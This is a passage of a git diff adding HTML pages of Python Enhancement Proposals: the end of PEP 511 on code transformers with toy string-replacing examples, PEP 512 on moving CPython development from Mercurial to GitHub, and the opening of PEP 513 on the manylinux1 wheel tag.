  • When loading a module, if the .pyc file is missing but the .py +is available, the .py is only used if code optimizers have the +same optimizer tag than the current tag, otherwise an ImportError +exception is raised.
  • +
+

Pseudo-code of a use_py() function to decide if a .py file can +be compiled to import a module:

+
def transformers_tag():
+    transformers = sys.get_code_transformers()
+    if not transformers:
+        return 'noopt'
+    return '-'.join(transformer.name
+                    for transformer in transformers)
+
+def use_py():
+    return (transformers_tag() == sys.implementation.optim_tag)
+
+
+

The order of sys.get_code_transformers() matter. For example, the +fat transformer followed by the pythran transformer gives the +optimizer tag fat-pythran.

+

The behaviour of the importlib module is unchanged with the default +optimizer tag ('opt').

+
+
+

Peephole optimizer

+

By default, sys.implementation.optim_tag is opt and +sys.get_code_transformers() returns a list of one code transformer: +the peephole optimizer (optimize the bytecode).

+

Use -o noopt to disable the peephole optimizer. In this case, the +optimizer tag is noopt and no code transformer is registered.

+

Using the -o opt option has not effect.

+
+
+

AST enhancements

+

Enhancements to simplify the implementation of AST transformers:

+
    +
  • Add a new compiler flag PyCF_TRANSFORMED_AST to get the +transformed AST. PyCF_ONLY_AST returns the AST before the +transformers.
  • +
+
+
+
+

Examples

+
+

.pyc filenames

+

Example of .pyc filenames of the os module.

+

With the default optimizer tag 'opt':

+ + + + + + + + + + + + + + + + + +
.pyc filenameOptimization level
os.cpython-36.opt-0.pyc0
os.cpython-36.opt-1.pyc1
os.cpython-36.opt-2.pyc2
+

With the 'fat' optimizer tag:

+ + + + + + + + + + + + + + + + + +
.pyc filenameOptimization level
os.cpython-36.fat-0.pyc0
os.cpython-36.fat-1.pyc1
os.cpython-36.fat-2.pyc2
+
+
+

Bytecode transformer

+

Scary bytecode transformer replacing all strings with +"Ni! Ni! Ni!":

+
import sys
+import types
+
+class BytecodeTransformer:
+    name = "knights_who_say_ni"
+
+    def code_transformer(self, code, context):
+        consts = ['Ni! Ni! Ni!' if isinstance(const, str) else const
+                  for const in code.co_consts]
+        return types.CodeType(code.co_argcount,
+                              code.co_kwonlyargcount,
+                              code.co_nlocals,
+                              code.co_stacksize,
+                              code.co_flags,
+                              code.co_code,
+                              tuple(consts),
+                              code.co_names,
+                              code.co_varnames,
+                              code.co_filename,
+                              code.co_name,
+                              code.co_firstlineno,
+                              code.co_lnotab,
+                              code.co_freevars,
+                              code.co_cellvars)
+
+# replace existing code transformers with the new bytecode transformer
+sys.set_code_transformers([BytecodeTransformer()])
+
+# execute code which will be transformed by code_transformer()
+exec("print('Hello World!')")
+
+
+

Output:

+
Ni! Ni! Ni!
+
+
+
+
+

AST transformer

+

Similarly to the bytecode transformer example, the AST transformer also +replaces all strings with "Ni! Ni! Ni!":

+
import ast
+import sys
+
+class KnightsWhoSayNi(ast.NodeTransformer):
+    def visit_Str(self, node):
+        node.s = 'Ni! Ni! Ni!'
+        return node
+
+class ASTTransformer:
+    name = "knights_who_say_ni"
+
+    def __init__(self):
+        self.transformer = KnightsWhoSayNi()
+
+    def ast_transformer(self, tree, context):
+        self.transformer.visit(tree)
+        return tree
+
+# replace existing code transformers with the new AST transformer
+sys.set_code_transformers([ASTTransformer()])
+
+# execute code which will be transformed by ast_transformer()
+exec("print('Hello World!')")
+
+
+

Output:

+
Ni! Ni! Ni!
+
+
+
+
+
+

Other Python implementations

+

The PEP 511 should be implemented by all Python implementation, but the +bytecode and the AST are not standardized.

+

By the way, even between minor version of CPython, there are changes on +the AST API. There are differences, but only minor differences. It is +quite easy to write an AST transformer which works on Python 2.7 and +Python 3.5 for example.

+
+
+

Discussion

+ +
+
+

Prior Art

+
+

AST optimizers

+

The Issue #17515 “Add sys.setasthook() to allow to use a custom AST” +optimizer was a first attempt of +API for code transformers, but specific to AST.

+

In 2015, Victor Stinner wrote the fatoptimizer project, an AST optimizer +specializing functions using guards.

+

In 2014, Kevin Conway created the PyCC +optimizer.

+

In 2012, Victor Stinner wrote the astoptimizer project, an AST optimizer +implementing various optimizations. Most interesting optimizations break +the Python semantics since no guard is used to disable optimization if +something changes.

+

In 2011, Eugene Toder proposed to rewrite some peephole optimizations in +a new AST optimizer: issue #11549, Build-out an AST optimizer, moving +some functionality out of the peephole optimizer. The patch adds ast.Lit (it +was proposed to rename it to ast.Literal).

+
+
+

Python Preprocessors

+
    +
  • MacroPy: MacroPy is an +implementation of Syntactic Macros in the Python Programming Language. +MacroPy provides a mechanism for user-defined functions (macros) to +perform transformations on the abstract syntax tree (AST) of a Python +program at import time.
  • +
  • pypreprocessor: C-style +preprocessor directives in Python, like #define and #ifdef
  • +
+
+
+

Bytecode transformers

+
    +
  • codetransformer: +Bytecode transformers for CPython inspired by the ast module’s +NodeTransformer.
  • +
  • byteplay: Byteplay lets you +convert Python code objects into equivalent objects which are easy to +play with, and lets you convert those objects back into living Python +code objects. It’s useful for applying crazy transformations on Python +functions, and is also useful in learning Python byte code +intricacies. See byteplay documentation.
  • +
+

See also:

+ +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0511.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0512/index.html b/pep-0512/index.html new file mode 100644 index 00000000000..9054382a314 --- /dev/null +++ b/pep-0512/index.html @@ -0,0 +1,1177 @@ + + + + + + + + PEP 512 – Migrating from hg.python.org to GitHub | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 512 – Migrating from hg.python.org to GitHub

+
+
Author:
+
Brett Cannon <brett at python.org>
+
Discussions-To:
+
Core-Workflow list
+
Status:
+
Final
+
Type:
+
Process
+
Created:
+
17-Jan-2015
+
Post-History:
+
17-Jan-2016, 19-Jan-2016, 23-Jan-2016
+
+
+
+
Table of Contents +
+
+

Note

+

CPython’s development process moved to https://github.com/python/cpython +on 2017-02-10.

+
+
+

Abstract

+

This PEP outlines the steps required to migrate Python’s development +process from Mercurial [3] as hosted at +hg.python.org [1] to Git [4] on GitHub [2]. Meeting +the minimum goals of this PEP should allow for the development +process of Python to be as productive as it currently is, and meeting +its extended goals should improve the development process from its +status quo.

+
+
+

Rationale

+

In 2014, it became obvious that Python’s custom development +process was becoming a hindrance. As an example, for an external +contributor to submit a fix for a bug that eventually was committed, +the basic steps were:

+
    +
  1. Open an issue for the bug at bugs.python.org [5].
  2. +
  3. Checkout out the CPython source code from hg.python.org [1].
  4. +
  5. Make the fix.
  6. +
  7. Upload a patch.
  8. +
  9. Have a core developer review the patch using our fork of the +Rietveld code review tool [6].
  10. +
  11. Download the patch to make sure it still applies cleanly.
  12. +
  13. Run the test suite manually.
  14. +
  15. Update the NEWS, ACKS, and “What’s New” document as necessary
  16. +
  17. Pull changes to avoid a merge race.
  18. +
  19. Commit the change manually.
  20. +
  21. If the change was for a bugfix release, merge into the +in-development branch.
  22. +
  23. Run the test suite manually again.
  24. +
  25. Commit the merge.
  26. +
  27. Push the changes.
  28. +
+

This is a very heavy, manual process for core developers. Even in the +simple case, you could only possibly skip the code review step, as you +would still need to build the documentation. This led to patches +languishing on the issue tracker due to core developers not being +able to work through the backlog fast enough to keep up with +submissions. In turn, that led to a side-effect issue of discouraging +outside contribution due to frustration from lack of attention, which +is a dangerous problem for an open source project with no corporate +backing as it runs counter to having a viable future for the project. +While allowing patches to be uploaded to bugs.python.org [5] is +potentially simple for an external contributor, it is as slow and +burdensome as it gets for a core developer to work with.

+

Hence the decision was made in late 2014 that a move to a new +development process was needed. A request for PEPs +proposing new workflows was made, in the end leading to two: +PEP 481 and PEP 507 proposing GitHub [2] and +GitLab [7], respectively.

+

The year 2015 was spent off-and-on working on those proposals and +trying to tease out details of what made them different from each +other on the core-workflow mailing list [8]. +PyCon US 2015 also showed that the community was a bit frustrated +with our process due to both cognitive overhead for new contributors +and how long it was taking for core developers to +look at a patch (see the end of Guido van Rossum’s +keynote at PyCon US 2015 [9] as an example of the +frustration).

+

On January 1, 2016, the decision was made by Brett Cannon to move the +development process to GitHub. The key reasons for choosing GitHub +were [10]:

+
    +
  • Maintaining custom infrastructure has been a burden on volunteers +(e.g., an unmaintained, custom fork of Rietveld [6] +is currently being used).
  • +
  • The custom workflow is very time-consuming for core developers +(not enough automated tooling built to help support it).
  • +
  • The custom workflow is a hindrance to external contributors +(acts as a barrier of entry due to time required to ramp up on +development process unique to CPython itself).
  • +
  • There is no feature differentiating GitLab from GitHub beyond +GitLab being open source.
  • +
  • Familiarity with GitHub is far higher among core developers and +external contributors than with GitLab.
  • +
  • Our BDFL prefers GitHub (who would be the first person to tell +you that his opinion shouldn’t matter, but the person making the +decision felt it was important that the BDFL feel comfortable with +the workflow of his own programming language to encourage his +continued participation).
  • +
+

There’s even already an unofficial logo to represent the +migration to GitHub [22].

+

The overarching goal of this migration is to improve the development +process to the extent that a core developer can go from external +contribution submission through all the steps leading to committing +said contribution from within a browser on a tablet with WiFi +using some development process (this does not inherently mean +GitHub’s default workflow). The final solution will also allow +an external contributor to contribute even if they chose not to use +GitHub (although there is not guarantee in feature parity).

+
+
+

Repositories to Migrate

+

While hg.python.org [1] hosts many repositories, there are only +five key repositories that need to move:

+
    +
  1. devinabox [12] (done)
  2. +
  3. benchmarks [11] (skipped)
  4. +
  5. peps [13] (done)
  6. +
  7. devguide [14] (done)
  8. +
  9. cpython [15]
  10. +
+

The devinabox repository is code-only. +The peps and devguide repositories involve the generation of webpages. +And the cpython repository has special requirements for integration +with bugs.python.org [5].

+
+
+

Migration Plan

+

The migration plan is separated into sections based on what is +required to migrate the repositories listed in the +Repositories to Migrate section. Completion of requirements +outlined in each section should unblock the migration of the related +repositories. The sections are expected to be completed in order, but +not necessarily the requirements within a section.

+
+

Requirements for Code-Only Repositories

+

Completion of the requirements in this section will allow the +devinabox repository to move to GitHub.

+
+

Create a ‘Python core’ team

+

To manage permissions, a ‘Python core’ team will be created as part of +the python organization [16]. Any repository that is +moved will have the ‘Python core’ team added to it with write +permissions [17]. Anyone who previously had rights to +manage SSH keys on hg.python.org will become a team maintainer for the +‘Python core’ team.

+
+
+

Define commands to move a Mercurial repository to Git

+

Since moving to GitHub also entails moving to Git [4], we must +decide what tools and commands we will run to translate a Mercurial +repository to Git. The tools developed specifically for this migration +are hosted at https://github.com/orsenthil/cpython-hg-to-git .

+
+
+

CLA enforcement

+

A key part of any open source project is making sure that its source +code can be properly licensed. This requires making sure all people +making contributions have signed a contributor license agreement +(CLA) [18]. Up until now, enforcement of CLA signing of +contributed code has been enforced by core developers checking +whether someone had an * by their username on +bugs.python.org [5]. With this migration, the plan is to start +off with automated checking and enforcement of contributors signing +the CLA.

+
+
Adding GitHub username support to bugs.python.org
+

To keep tracking of CLA signing under the direct control of the PSF, +tracking who has signed the PSF CLA will be continued by marking that +fact as part of someone’s bugs.python.org user profile. What this +means is that an association will be needed between a person’s +bugs.python.org [5] account and their GitHub account, which +will be done through a new field in a user’s profile. This does +implicitly require that contributors will need both a +GitHub [2] and bugs.python.org account in order to sign the +CLA and contribute through GitHub.

+

An API is provided to query bugs.python.org to see if a GitHub +username corresponds to someone who has signed the CLA. Making a GET +request to e.g. +http://bugs.python.org/user?@template=clacheck&github_names=brettcannon,notanuser +returns a JSON dictionary with the keys of the usernames requested +and a true value if they have signed the CLA, false if they +have not, and null if no corresponding GitHub username was found.

+
+
+
A bot to enforce CLA signing
+

With an association between someone’s GitHub account and their +bugs.python.org [5] account, which has the data as to whether +someone has signed the CLA, a bot can monitor pull requests on +GitHub and denote whether the contributor has signed the CLA.

+

If the user has signed the CLA, the bot will add a positive label to +the issue to denote the pull request has no CLA issues (e.g., a green +label stating, “CLA signed”). If the contributor has not signed a CLA, +a negative label will be added to the pull request will be blocked +using GitHub’s status API (e.g., a red label stating, “CLA not signed”). +If a contributor lacks a bugs.python.org account, that will lead to +the negative label being used as well. Using a label for both +positive and negative cases provides a fallback signal if the +bot happens to fail, preventing potential false-positives or +false-negatives. It also allows for an easy way to trigger the bot +again by simply removing a CLA-related label (this is in contrast to +using a GitHub status check [40] which is only +triggered on code changes).

+

As no pre-existing bot exists to meet our needs, it will be hosted on +Heroku [39] and written to target Python 3.5 to act as a +showcase for asynchronous programming. The code for the bot is hosted +in the Knights Who Say Ni project [41].

+
+
+
+

Make old repository read-only

+

Updating .hg/hgrc in the now-old Mercurial repository in the [hooks] +section with:

+
pretxnchangegroup.reject = echo " * This repo has been migrated to github.com/python/peps and does not accept new commits in Mercurial!" 2>&1; exit 1
+
+
+

will make the repository read-only.

+
+
+ +
+

Requirements for the cpython Repository

+

Obviously the most active and important repository currently hosted +at hg.python.org [1] is the cpython +repository [15]. Because of its importance and +high-frequency use, it requires more tooling before being moved to GitHub +compared to the other repositories mentioned in this PEP.

+
+

Document steps to commit a pull request

+

During the process of choosing a new development workflow, it was +decided that a linear history is desired. People preferred having a +single commit representing a single change instead of having a set of +unrelated commits lead to a merge commit that represented a single +change. This means that the convenient “Merge” button in GitHub pull +requests will be set to only do squash commits and not merge +commits.

+

A second set of recommended commands will also be written for +committing a contribution from a patch file uploaded to +bugs.python.org [5]. This will obviously help keep the linear +history, but it will need to be made to have attribution to the patch +author.

+

The exact sequence of commands that will be given as guidelines to +core developers is an open issue: +Git CLI commands for committing a pull request to cpython.

+
+
+

Linking pull requests to issues

+

Historically, external contributions were attached to an issue on +bugs.python.org [5] thanks to the fact that all external +contributions were uploaded as a file. For changes committed by a +core developer who committed a change directly, the specifying of an +issue number in the commit message of the format Issue # at the +start of the message led to a comment being posted to the issue +linking to the commit.

+
+
Linking a pull request to an issue
+

An association between a pull request and an issue is needed to track +when a fix has been proposed. The association needs to be many-to-one +as there can take multiple pull requests to solve a single issue +(technically it should be a many-to-many association for when a +single fix solves multiple issues, but this is fairly rare and issues +can be merged into one using the Superseder field on the issue +tracker).

+

The association between a pull request and an issue will be done based +on detecting an issue number. If the issue is specified in either the +title or in the body of a message on a pull request then a connection +will be made on bugs.python.org [5]. Some visible notification +– e.g. label or message – will be made to the pull request to +notify that the association was successfully made.

+
+
+
Notify the issue if a commit is made
+

Once a commit is made, the corresponding issue should be updated to +reflect this fact. This should work regardless of whether the commit +came from a pull request or a direct commit.

+
+
+
+

Update the linking service for mapping commit IDs to URLs

+

Currently you can use https://hg.python.org/lookup/ with a revision +ID from either the Subversion or Mercurial copies of the +cpython repo [15] to get redirected to the URL for that +revision in the Mercurial repository. The URL rewriter will need to +be updated to redirect to the Git repository and to support the new +revision IDs created for the Git repository.

+

The most likely design is to statically know all the Mercurial +changeset numbers once the migration has occurred. The lookup code +will then be updated to accept hashes from 7 to 40 hexadecimal digits. +Any hexadecimal of length 12 or 40 will be compared against the +Mercurial changeset numbers. If the number doesn’t match or is of some +other length between 7 and 40 then it will be assumed to be a Git hash.

+

The bugs.python.org commit number rewriter +will also need to be updated to accept hashes as short as 7 digits as +Git will match on hashes that short or longer.

+
+
+

Deprecate sys._mercurial

+

Once Python is no longer kept in Mercurial, the sys._mercurial +attribute will need to be changed to return ('CPython', '', ''). +An equivalent sys._git attribute will be added which fulfills the +same use-cases.

+
+
+

Update the devguide

+

The devguide will need to be updated with details of the new +workflow. Mostly likely work will take place in a separate branch +until the migration actually occurs.

+
+
+

Update PEP 101

+

The release process will need to be updated as necessary.

+
+
+
+

Optional, Planned Features

+

Once the cpython repository [15] is migrated, all +repositories will have been moved to GitHub [2] and the +development process should be on equal footing as before the move. But +a key reason for this migration is to improve the development process, +making it better than it has ever been. This section outlines some +plans on how to improve things.

+

It should be mentioned that overall feature planning for +bugs.python.org [5] – which includes plans independent of this +migration – are tracked on their own wiki page [23].

+
+

Handling Misc/NEWS

+

Traditionally the Misc/NEWS file [19] has been +problematic for changes which spanned Python releases. Oftentimes +there will be merge conflicts when committing a change between e.g., +3.5 and 3.6 only in the Misc/NEWS file. It’s so common, in fact, +that the example instructions in the devguide explicitly mention how +to resolve conflicts in the Misc/NEWS file +[21]. As part of our tool +modernization, working with the Misc/NEWS file will be +simplified.

+

The planned approach is to use an individual file per news entry, +containing the text for the entry. In this scenario, each feature +release would have its own directory for news entries and a separate +file would be created in that directory that was either named after +the issue it closed or a timestamp value (which prevents collisions). +Merges across branches would have no issue as the news entry file +would still be uniquely named and in the directory of the latest +version that contained the fix. A script would collect all news entry +files no matter what directory they reside in and create an +appropriate news file (the release directory can be ignored as the +mere fact that the file exists is enough to represent that the entry +belongs to the release). Classification can either be done by keyword +in the new entry file itself or by using subdirectories representing +each news entry classification in each release directory (or +classification of news entries could be dropped since critical +information is captured by the “What’s New” documents which are +organized). The benefit of this approach is that it keeps the changes +with the code that was actually changed. It also ties the message to +being part of the commit which introduced the change. For a commit +made through the CLI, a script could be provided to help generate the +file. In a bot-driven scenario, the merge bot could have a way to +specify a specific news entry and create the file as part of its +flattened commit (while most likely also supporting using the first +line of the commit message if no specific news entry was specified). +If a web-based workflow is used then a status check could be used to +verify that a new entry file is in the pull request to act as a +reminder that the file is missing. Code for this approach has been +written previously for the Mercurial workflow at +http://bugs.python.org/issue18967. There is also tools from the +community like https://pypi.python.org/pypi/towncrier, +https://github.com/twisted/newsbuilder, and +http://docs.openstack.org/developer/reno/.

+

Discussions at the Sep 2016 Python core-dev sprints led to this +decision compared to the rejected approaches outlined in the +Rejected Ideas section of this PEP. The separate files approach +seems to have the right balance of flexibility and potential tooling +out of the various options while solving the motivating problem.

+

Work for this is being tracked at +https://github.com/python/core-workflow/issues/6.

+
+
+

Handling Misc/ACKS

+

Traditionally the Misc/ACKS file [20] has been managed +by hand. But thanks to Git supporting an author value as well as +a committer value per commit, authorship of a commit can be part +of the history of the code itself.

+

As such, manual management of Misc/ACKS will become optional. A +script will be written that will collect all author and committer +names and merge them into Misc/ACKS with all of the names listed +prior to the move to Git. Running this script will become part of the +release process.

+

The script should also generate a list of all people who contributed +since the last execution. This will allow having a list of those who +contributed to a specific release so they can be explicitly thanked.

+

Work for this is being tracked at +https://github.com/python/core-workflow/issues/7.

+
+
+

Create https://git.python.org

+

Just as hg.python.org [1] currently points to the Mercurial +repository for Python, git.python.org should do the equivalent for +the Git repository.

+
+
+

Backup of pull request data

+

Since GitHub [2] is going to be used for code hosting and code +review, those two things need to be backed up. In the case of code +hosting, the backup is implicit as all non-shallow Git [4] clones +contain the full history of the repository, hence there will be many +backups of the repository.

+

The code review history does not have the same implicit backup +mechanism as the repository itself. That means a daily backup of code +review history should be done so that it is not lost in case of any +issues with GitHub. It also helps guarantee that a migration from +GitHub to some other code review system is feasible were GitHub to +disappear overnight.

+
+
+

Bot to generate cherry-pick pull requests

+

Since the decision has been made to work with cherry-picks instead of +forward merging of branches, it would be convenient to have a bot that +would generate pull requests based on cherry-picking for any pull +requests that affect multiple branches. The most likely design is a +bot that monitors merged pull requests with key labels applied that +delineate what branches the pull request should be cherry-picked into. +The bot would then generate cherry-pick pull requests for each label +and remove the labels as the pull requests are created (this allows +for easy detection when automatic cherry-picking failed).

+

Work for this is being tracked at +https://github.com/python/core-workflow/issues/8.

+
+
+

Pull request commit queue

+

This would linearly apply accepted pull requests and verify that the +commits did not interfere with each other by running the test suite +and backing out commits if the test run failed. To help facilitate +the speed of testing, all patches committed since the last test run +can be applied at once under a single test run as the optimistic +assumption is that the patches will work in tandem. Some mechanism to +re-run the tests in case of test flakiness will be needed, whether it +is from removing a “test failed” label, web interface for core +developers to trigger another testing event, etc.

+

Inspiration or basis of the bot could be taken from pre-existing bots +such as Homu [31] or Zuul [32].

+

The name given to this bot in order to give it commands is an open +issue: Naming the bots.

+
+
+

A CI service

+

There are various CI services that provide free support for open +source projects hosted on GitHub [2]. After experimenting +with a couple CI services, the decision was made to go with +Travis [33].

+

The current CI service for Python is Pypatcher [38]. A +request can be made in IRC to try a patch from +bugs.python.org [5]. The results can be viewed at +https://ci.centos.org/job/cPython-build-patch/ .

+

Work for this is being tracked at +https://github.com/python/core-workflow/issues/1.

+
+
+

Test coverage report

+

Getting an up-to-date test coverage report for Python’s standard +library would be extremely beneficial as generating such a report can +take quite a while to produce.

+

There are a couple pre-existing services that provide free test +coverage for open source projects. In the end, Codecov [37] was +chosen as the best option.

+

Work for this is being tracked at +https://github.com/python/core-workflow/issues/2.

+
+
+

Notifying issues of pull request comments

+

The current development process does not include notifying an issue +on bugs.python.org [5] when a review comment is left on +Rietveld [6]. It would be nice to fix this so that people +can subscribe only to comments at bugs.python.org and not +GitHub [2] and yet still know when something occurs on GitHub +in terms of review comments on relevant pull requests. Current +thinking is to post a comment to bugs.python.org to the relevant +issue when at least one review comment has been made over a certain +period of time (e.g., 15 or 30 minutes, although with GitHub now +supporting +reviews +the time aspect may be unnecessary). This keeps the email volume +down for those that receive both GitHub and bugs.python.org email +notifications while still making sure that those only following +bugs.python.org know when there might be a review comment to address.

+
+
+

Allow bugs.python.org to use GitHub as a login provider

+

As of right now, bugs.python.org [5] allows people to log in +using Google, Launchpad, or OpenID credentials. It would be good to +expand this to GitHub credentials.

+
+
+

Web hooks for re-generating web content

+

The content at https://docs.python.org/, +https://docs.python.org/devguide, and +https://www.python.org/dev/peps/ are all derived from files kept in +one of the repositories to be moved as part of this migration. As +such, it would be nice to set up appropriate webhooks to trigger +rebuilding the appropriate web content when the files they are based +on change instead of having to wait for, e.g., a cronjob to trigger.

+

This can partially be solved if the documentation is a Sphinx project +as then the site can have an unofficial mirror on +Read the Docs, e.g. +http://cpython-devguide.readthedocs.io/.

+

Work for this is being tracked at +https://github.com/python/core-workflow/issues/9.

+
+ +
+

Splitting out parts of the documentation into their own repositories

+

While certain parts of the documentation at https://docs.python.org +change with the code, other parts are fairly static and are not +tightly bound to the CPython code itself. The following sections of +the documentation fit this category of slow-changing, +loosely-coupled:

+ +

These parts of the documentation could be broken out into their own +repositories to simplify their maintenance and to expand who has +commit rights to them to ease in their maintenance.

+

It has also been suggested to split out the +What’s New +documents. That would require deciding whether a workflow could be +developed where it would be difficult to forget to update +What’s New (potentially through a label added to PRs, like +“What’s New needed”).

+
+
+

Backup of Git repositories

+

While not necessary, it would be good to have official backups of the +various Git repositories for disaster protection. It will be up to +the PSF infrastructure committee to decide if this is worthwhile or +unnecessary.

+
+
+

Identify potential new core developers

+

The Python development team has long-standing guidelines for +selecting new core developers. The key part of the guidelines is that +a person needs to have contributed multiple patches which have been +accepted and are high enough quality and size to demonstrate an +understanding of Python’s development process. A bot could be written +which tracks patch acceptance rates and generates a report to help +identify contributors who warrant consideration for becoming core +developers. This work doesn’t even necessarily require GitHub +integration as long as the committer field in all git commits is +filled in properly.

+

Work is being tracked at +https://github.com/python/core-workflow/issues/10.

+
+
+
+
+

Status

+

Requirements for migrating the devinabox [12] +repository:

+ +

Repositories whose build steps need updating:

+
    +
  • Completed +
  • +
+
+

cpython repo [15]

+

Required:

+ +

Optional features:

+ +
+
+
+

Open Issues

+

For this PEP, open issues are ones where a decision needs to be made +to how to approach or solve a problem. Open issues do not entail +coordination issues such as who is going to write a certain bit of +code.

+
+

The fate of hg.python.org

+

With the code repositories moving over to Git [4], there is no +technical need to keep hg.python.org [1] running. Having said +that, some in the community would like to have it stay functioning as +a Mercurial [3] mirror of the Git repositories. Others have said +that they still want a mirror, but one using Git.

+

As maintaining hg.python.org is not necessary, it will be up to the +PSF infrastructure committee to decide if they want to spend the +time and resources to keep it running. They may also choose whether +they want to host a Git mirror on PSF infrastructure.

+

Depending on the decision reached, other ancillary repositories will +either be forced to migration or they can choose to simply stay on +hg.python.org.

+
+
+

Git CLI commands for committing a pull request to cpython

+

Because Git [4] may be a new version control system for core +developers, the commands people are expected to run will need to be +written down. These commands also need to keep a linear history while +giving proper attribution to the pull request author.

+

Another set of commands will also be necessary for when working with +a patch file uploaded to bugs.python.org [5]. Here the linear +history will be kept implicitly, but it will need to make sure to +keep/add attribution.

+
+
+

Naming the bots

+

As naming things can lead to bikeshedding of epic proportions, Brett +Cannon will choose the final name of the various bots (the name of +the project for the bots themselves can be anything, this is purely +for the name used in giving commands to the bot or the account name). +The names must come from Monty Python, which is only fitting since +Python is named after the comedy troupe.

+
+
+
+

Rejected Ideas

+
+

Separate Python 2 and Python 3 repositories

+

It was discussed whether separate repositories for Python 2 and +Python 3 were desired. The thinking was that this would shrink the +overall repository size which benefits people with slow Internet +connections or small bandwidth caps.

+

In the end it was decided that it was easier logistically to simply +keep all of CPython’s history in a single repository.

+
+
+

Commit multi-release changes in bugfix branch first

+

As the current development process has changes committed in the +oldest branch first and then merged up to the default branch, the +question came up as to whether this workflow should be perpetuated. +In the end it was decided that committing in the newest branch and +then cherry-picking changes into older branches would work best as +most people will instinctively work off the newest branch and it is a +more common workflow when using Git [4].

+

Cherry-picking is also more bot-friendly for an in-browser workflow. +In the merge-up scenario, if you were to request a bot to do a merge +and it failed, then you would have to make sure to immediately solve +the merge conflicts if you still allowed the main commit, else you +would need to postpone the entire commit until all merges could be +handled. With a cherry-picking workflow, the main commit could +proceed while postponing the merge-failing cherry-picks. This allows +for possibly distributing the work of managing conflicting merges.

+

Lastly, cherry-picking should help avoid merge races. Currently, when +one is doing work that spans branches, it takes time to commit in the +older branch, possibly push to another clone representing the +default branch, merge the change, and then push upstream. +Cherry-picking should decouple this so that you don’t have to rush +your multi-branch changes as the cherry-pick can be done separately.

+
+
+

Deriving Misc/NEWS from the commit logs

+

As part of the discussion surrounding Handling Misc/NEWS, the +suggestion has come up of deriving the file from the commit logs +itself. In this scenario, the first line of a commit message would be +taken to represent the news entry for the change. Some heuristic to +tie in whether a change warranted a news entry would be used, e.g., +whether an issue number is listed.

+

This idea has been rejected due to some core developers preferring to +write a news entry separate from the commit message. The argument is +the first line of a commit message compared to that of a news entry +have different requirements in terms of brevity, what should be said, +etc.

+
+
+

Deriving Misc/NEWS from bugs.python.org

+

A rejected solution to the NEWS file problem was to specify the +entry on bugs.python.org [5]. This would mean an issue that is +marked as “resolved” could not be closed until a news entry is added +in the “news” field in the issue tracker. The benefit of tying the +news entry to the issue is it makes sure that all changes worthy of a +news entry have an accompanying issue. It also makes classifying a +news entry automatic thanks to the Component field of the issue. The +Versions field of the issue also ties the news entry to which Python +releases were affected. A script would be written to query +bugs.python.org for relevant new entries for a release and to produce +the output needed to be checked into the code repository. This +approach is agnostic to whether a commit was done by CLI or bot. A +drawback is that there’s a disconnect between the actual commit that +made the change and the news entry by having them live in separate +places (in this case, GitHub and bugs.python.org). This would mean +making a commit would then require remembering to go back to +bugs.python.org to add the news entry.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0512.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0513/index.html b/pep-0513/index.html new file mode 100644 index 00000000000..41b18a27434 --- /dev/null +++ b/pep-0513/index.html @@ -0,0 +1,762 @@ + + + + + + + + PEP 513 – A Platform Tag for Portable Linux Built Distributions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 513 – A Platform Tag for Portable Linux Built Distributions

+
+
Author:
+
Robert T. McGibbon <rmcgibbo at gmail.com>, Nathaniel J. Smith <njs at pobox.com>
+
BDFL-Delegate:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Superseded
+
Type:
+
Informational
+
Topic:
+
Packaging
+
Created:
+
19-Jan-2016
+
Post-History:
+
19-Jan-2016, 25-Jan-2016, 29-Jan-2016
+
Superseded-By:
+
600
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the creation of a new platform tag for Python package built +distributions, such as wheels, called manylinux1_{x86_64,i686} with +external dependencies limited to a standardized, restricted subset of +the Linux kernel and core userspace ABI. It proposes that PyPI support +uploading and distributing wheels with this platform tag, and that pip +support downloading and installing these packages on compatible platforms.

+
+
+

Rationale

+

Currently, distribution of binary Python extensions for Windows and OS X is +straightforward. Developers and packagers build wheels (PEP 427, PEP 491), +which are +assigned platform tags such as win32 or macosx_10_6_intel, and upload +these wheels to PyPI. Users can download and install these wheels using tools +such as pip.

+

For Linux, the situation is much more delicate. In general, compiled Python +extension modules built on one Linux distribution will not work on other Linux +distributions, or even on different machines running the same Linux +distribution with different system libraries installed.

+

Build tools using PEP 425 platform tags do not track information about the +particular Linux distribution or installed system libraries, and instead assign +all wheels the too-vague linux_i686 or linux_x86_64 tags. Because of +this ambiguity, there is no expectation that linux-tagged built +distributions compiled on one machine will work properly on another, and for +this reason, PyPI has not permitted the uploading of wheels for Linux.

+

It would be ideal if wheel packages could be compiled that would work on any +linux system. But, because of the incredible diversity of Linux systems – from +PCs to Android to embedded systems with custom libcs – this cannot +be guaranteed in general.

+

Instead, we define a standard subset of the kernel+core userspace ABI that, +in practice, is compatible enough that packages conforming to this standard +will work on many linux systems, including essentially all of the desktop +and server distributions in common use. We know this because there are +companies who have been distributing such widely-portable pre-compiled Python +extension modules for Linux – e.g. Enthought with Canopy [4] and Continuum +Analytics with Anaconda [5].

+

Building on the compatibility lessons learned from these companies, we thus +define a baseline manylinux1 platform tag for use by binary Python +wheels, and introduce the implementation of preliminary tools to aid in the +construction of these manylinux1 wheels.

+
+
+

Key Causes of Inter-Linux Binary Incompatibility

+

To properly define a standard that will guarantee that wheel packages meeting +this specification will operate on many linux platforms, it is necessary to +understand the root causes which often prevent portability of pre-compiled +binaries on Linux. The two key causes are dependencies on shared libraries +which are not present on users’ systems, and dependencies on particular +versions of certain core libraries like glibc.

+
+

External Shared Libraries

+

